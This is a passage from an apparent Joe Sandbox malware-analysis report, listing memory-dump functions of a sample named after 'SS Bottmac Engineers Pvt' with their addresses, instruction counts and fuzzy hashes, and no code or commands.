                                • Instruction Fuzzy Hash: 0D2192B55093808FDB07CF24D594716BF71EB46214F28C5DBD8498F2A7C33A980ACB62
                                Function 0140D4BF Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2464926496.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_140d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction ID: da3afa56ec206fc36f90f67ac42aa01cf4af333576415a6b9133d3f349d3d68e
                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction Fuzzy Hash: 2211A276904240CFDB16CF54D5C4B16BF71FB88314F24C5AADD450B666C336D45ACBA1
                                Function 0141D1CF Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2465026342.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_141d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction ID: 88069b86647ae4ad3f9c60cb7d782eb73d9c00a163b5e5f9d2fd3b8f10f81323
                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction Fuzzy Hash: 7711BEB5904280DFDB02CF54C5C4B16BFA1FB84224F24C6AAD8494B766C33AD40ACB61

                                Executed Functions

                                Function 00F513E0 Relevance: 4.2, Strings: 3, Instructions: 442COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q$$]q
                                • API String ID: 0-182748909
                                • Opcode ID: 1a5a84d9470b770c916292a94c9f3e68b0dbc6402691a0fb06e661211364da64
                                • Instruction ID: cbfb8d4636b679b6d1ae28f3976e2a29b3a905f241d7b4bd514711c53382c547
                                • Opcode Fuzzy Hash: 1a5a84d9470b770c916292a94c9f3e68b0dbc6402691a0fb06e661211364da64
                                • Instruction Fuzzy Hash: F8F1AE347003018FDB09AF78E958B6E7BA6FF88704F148428E90ADB7A5DE759C05DB91
                                Function 00F513D0 Relevance: 2.8, Strings: 2, Instructions: 332COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q
                                • API String ID: 0-127220927
                                • Opcode ID: c2e175793bcf8241164b00ccde9d8eb3d2ec6d5e5a17dbebda24ecf4d9d0805a
                                • Instruction ID: 9c81f4eedb0e9494c0dee0c4c228997df50bbf78000d8b2a255625dbb975abdc
                                • Opcode Fuzzy Hash: c2e175793bcf8241164b00ccde9d8eb3d2ec6d5e5a17dbebda24ecf4d9d0805a
                                • Instruction Fuzzy Hash: B0C1BE347003018FCB09AF34E958B2E77A7FB88745F148528E90A9B7A9DF759C06DB91
                                Function 00F514C2 Relevance: 2.8, Strings: 2, Instructions: 279COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q
                                • API String ID: 0-127220927
                                • Opcode ID: d65a9f2ea2bfb89dc012256c1a7631a0b2fa9e851ea4c71833fd6554594845a1
                                • Instruction ID: 39c98089b49304973ca13258294be711e51294fd9978c9e81dc9adc47dbb67f4
                                • Opcode Fuzzy Hash: d65a9f2ea2bfb89dc012256c1a7631a0b2fa9e851ea4c71833fd6554594845a1
                                • Instruction Fuzzy Hash: 05A1BE307003018FD719AF78D954B2E77E7BF88715F148828D90A9B3A9DF35AC069BA1
                                Function 00F50E00 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: LR]q
                                • API String ID: 0-3081347316
                                • Opcode ID: 2d4ea0f0d8cf0fda46f9b4cff05b4cbf879ed62718133ffffd68075fe2bdc639
                                • Instruction ID: 143456394e9c714ae53277ab87901a2774dde357c5dedd111ac61378e897e7b4
                                • Opcode Fuzzy Hash: 2d4ea0f0d8cf0fda46f9b4cff05b4cbf879ed62718133ffffd68075fe2bdc639
                                • Instruction Fuzzy Hash: 46212630B002158FCB59EB78855563E7BF2AFC8304B2488A9D509DB396DE74DD06C7A2
                                Function 00F50DF0 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: LR]q
                                • API String ID: 0-3081347316
                                • Opcode ID: 866f2a591fb9d277ed92800ca78de5865e7e26e392908443f001783f776413b3
                                • Instruction ID: bfc0a2ae36a38b856080aa297e393c54718075340e795531ec344c9966c0800c
                                • Opcode Fuzzy Hash: 866f2a591fb9d277ed92800ca78de5865e7e26e392908443f001783f776413b3
                                • Instruction Fuzzy Hash: EE213730B002559FCB55DB38885563E7BF2AFC5305B288869D44ADB395DE30CD0783A2
                                Function 00F50901 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: Haq
                                • API String ID: 0-725504367
                                • Opcode ID: 4fdb5d44dae2334381300b6e1b0d06cfb495a9b3c2e3478c63af6311e488bfda
                                • Instruction ID: 849674fe482ce5327296c7602f42fafe8b1c97f421eb2258fa62550053f01e9f
                                • Opcode Fuzzy Hash: 4fdb5d44dae2334381300b6e1b0d06cfb495a9b3c2e3478c63af6311e488bfda
                                • Instruction Fuzzy Hash: B721B030E082489FCB44EBB888553AD7FE1AF45310F1580BAC848DB396EE348E06C7A1
                                Function 00F5128F Relevance: .1, Instructions: 97COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 96c0a3ad32b1801a5b7cc0ba815e125fa71ba073290006a7c9019c31207aeeb4
                                • Instruction ID: 12fd1cb5df2e95e2375f5dd8b95ff8bb55e3e11fa7356fad98317697cb680d3d
                                • Opcode Fuzzy Hash: 96c0a3ad32b1801a5b7cc0ba815e125fa71ba073290006a7c9019c31207aeeb4
                                • Instruction Fuzzy Hash: 1F217E309093959FCB02EF78E9A06EDBFB4EF46304B0444EBD449DB262E6305A09CB61
                                Function 00F50CE0 Relevance: .1, Instructions: 90COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8b58ea8eaf1a32fb3df12ce6e8a1adcae4211fde531e3e2979f318d5ce6eb7e1
                                • Instruction ID: c1955a4d62f8b5d678398075175e24e65731757d86591ceaa450a56bda6224f8
                                • Opcode Fuzzy Hash: 8b58ea8eaf1a32fb3df12ce6e8a1adcae4211fde531e3e2979f318d5ce6eb7e1
                                • Instruction Fuzzy Hash: EB21B571B042059FCB04AFBD995536E7ADAEFC9300B14886AD45EC3396ED344C098761
                                Function 00F50BC9 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 185a31ecd52a7ad2ae7e138d690e5c8b40ef972cffe71703629608ad0d6b003c
                                • Instruction ID: 1ed0ef2979cdadad583c2ad2a802c31aab0ce98c2aeba589c99ffc4cd9e732da
                                • Opcode Fuzzy Hash: 185a31ecd52a7ad2ae7e138d690e5c8b40ef972cffe71703629608ad0d6b003c
                                • Instruction Fuzzy Hash: B2318F74900349DFCB05EFB8EA4079D7BBAFF89304F104969D405AB359DB34AA49CB51
                                Function 00F50BD8 Relevance: .1, Instructions: 69COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e752c0f136b196fe31284d027c8bf6cb8282f6d9237bef05e152c12180c78a8d
                                • Instruction ID: d066e521859fe680a2afe80f8fb84de7f624f06664b8fddafb0bedf04675619c
                                • Opcode Fuzzy Hash: e752c0f136b196fe31284d027c8bf6cb8282f6d9237bef05e152c12180c78a8d
                                • Instruction Fuzzy Hash: 9F219174900309DFCB05EFB4EA44B9D7BBAFF88304F104969D405A7358DB34AA45CB51
                                Function 00F50838 Relevance: .0, Instructions: 46COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4d08a84859f599b696a0934b5d0cf2b634570227f8a3c9f2f51a58f2c6521712
                                • Instruction ID: 02a44919379a16e5ee7a80ce51d4777a9942471fd058260fa22cd79fd308233e
                                • Opcode Fuzzy Hash: 4d08a84859f599b696a0934b5d0cf2b634570227f8a3c9f2f51a58f2c6521712
                                • Instruction Fuzzy Hash: 4811DD346563459FCB06EF68FB54B457BB9FB553087005AA5D0088FA3ED774AA09CF80
                                Function 00F51300 Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1ad9639ad0fed1a2b356a6c3ed2e01ad83775f24489036c17eab090a970306eb
                                • Instruction ID: d7a3a76c79bd0e86c425c158357615aa3b4128511d2af1c403277bd8ad1cdd92
                                • Opcode Fuzzy Hash: 1ad9639ad0fed1a2b356a6c3ed2e01ad83775f24489036c17eab090a970306eb
                                • Instruction Fuzzy Hash: 8D111530D10209AFCB44FFB8EA51AACBBF9EF44304B108569D009E7365EB306A05CB60
                                Function 00F50848 Relevance: .0, Instructions: 38COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.2496956819.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_f50000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9ea980409ca567b30b22a45e5c36f12ebfc382c0a48d24ecfbc21ac93b8498e6
                                • Instruction ID: 1e99a2dffdc3649dcc275da3e5f83ebcb3d940122cd3caa0e8f11d458ff3256a
                                • Opcode Fuzzy Hash: 9ea980409ca567b30b22a45e5c36f12ebfc382c0a48d24ecfbc21ac93b8498e6
                                • Instruction Fuzzy Hash: 830199356523069FCB06FF18FB94F5577A9FB54349B009A6490088BB2DE774AA0ACF80